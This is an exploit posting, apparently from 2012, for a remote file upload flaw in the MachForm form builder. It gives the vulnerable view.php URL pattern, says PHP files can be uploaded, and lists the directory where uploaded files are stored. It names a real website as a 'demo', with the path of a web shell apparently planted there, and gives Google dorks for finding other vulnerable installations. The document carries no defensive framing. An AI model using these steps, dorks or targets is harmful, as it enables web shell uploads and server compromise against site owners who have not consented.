************************************************************************************************** | @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ | | @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ | | @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ | ************************************************************************************************** ================================================================================================== # [~] Exploit Title: MachForm RFU Bug # # [~] Google Dork (For RFU) : " Bottom Of The Exploit " # # [~] Date: 09/11/2012 (TU) # # [~] Exploit Author: Samim.s # # [~] Version: ALL Versions & ALL Languages # # [~] Tested on: Se7en & BT5 # # [~] Support WebSite : MachForm.com # ================================================================================================== # [+] RFU Exploit : # # http://WebSite.Com/[path]/view.php?id=X <~~ X = Number # # [+] Demo : # # http://www.birchgate.ca/machform/view.php?id=2 <~~ You Can Upload .PHP Files # # # # [+] Uploaded Files Address : # # http://WebSite.Com/[path]/data/form_X/files/ <~~ X = ID # # [+] Demo : # # http://www.birchgate.ca/machform/data/form_2/files/ # # Shell Address : element_6_900ebef8bf2f2a73e6af22a2251e039c-197-Samim.s.php # # # ---------------------------------------------------------------------------------------------- # # [+] Dorks : # # intitle:"index of /form/data/*/files/" # # inurl:"/form/view.php?id=" intext:"upload" # ================================================================================================== # [*] GreetZ To: Mr.XpR - UnknowN - Mr.EBI - SaMaN.BiLiZ & All IRaNHaCK Member + Iranian HaCkerZ # ==================================================================================================